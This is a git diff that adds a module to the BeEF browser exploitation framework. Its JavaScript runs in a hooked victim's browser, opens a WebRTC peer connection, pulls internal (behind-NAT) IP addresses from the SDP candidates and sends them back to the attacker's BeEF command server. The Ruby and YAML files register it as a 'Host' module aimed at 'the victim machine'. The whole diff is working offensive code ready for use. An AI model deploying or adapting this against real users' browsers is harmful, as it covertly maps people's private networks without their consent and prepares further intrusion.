diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js new file mode 100755 index 000000000..e5f663ba9 --- /dev/null +++ b/modules/host/get_internal_ip_webrtc/command.js @@ -0,0 +1,60 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var RTCPeerConnection = window.webkitRTCPeerConnection || window.mozRTCPeerConnection; + + if (RTCPeerConnection) (function () { + + var addrs = Object.create(null); + addrs["0.0.0.0"] = false; + + // Establish a connection with ICE / relay servers - in this instance: NONE + var rtc = new RTCPeerConnection({iceServers:[]}); + if (window.mozRTCPeerConnection) { // FF needs a channel/stream to proceed + rtc.createDataChannel('', {reliable:false}); + }; + + // Upon an ICE candidate being found + // Grep the SDP data for IP address data + rtc.onicecandidate = function (evt) { + if (evt.candidate) grepSDP(evt.candidate.candidate); + }; + + // Create an SDP offer + rtc.createOffer(function (offerDesc) { + grepSDP(offerDesc.sdp); + rtc.setLocalDescription(offerDesc); + }, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); }); + + function processIPs(newAddr) { + if (newAddr in addrs) return; + else addrs[newAddr] = true; + var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps ")); + } + + function grepSDP(sdp) { + var hosts = []; + sdp.split('\r\n').forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39 + if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13 + var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1 + addr = parts[4], + type = parts[7]; + if (type === 'host') processIPs(addr); + } else if (~line.indexOf("c=")) { // http://tools.ietf.org/html/rfc4566#section-5.7 + var parts = line.split(' '), + addr = parts[2]; + processIPs(addr); + } + }); + } + })(); else { + beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection"); + } + +}); diff --git a/modules/host/get_internal_ip_webrtc/config.yaml b/modules/host/get_internal_ip_webrtc/config.yaml new file mode 100755 index 000000000..53b964e01 --- /dev/null +++ b/modules/host/get_internal_ip_webrtc/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + get_internal_ip_webrtc: + enable: true + category: "Host" + name: "Get Internal IP WebRTC" + description: "Retrieve the internal (behind NAT) IP address of the victim machine using WebRTC Peer-to-Peer connection framework. Code from http://net.ipcalf.com/" + authors: ["xntrik", "@natevw"] + target: + working: ["C", "FF"] + unknown: ["All"] diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb new file mode 100755 index 000000000..3f501683a --- /dev/null +++ b/modules/host/get_internal_ip_webrtc/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Get_internal_ip_webrtc < BeEF::Core::Command + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + end + +end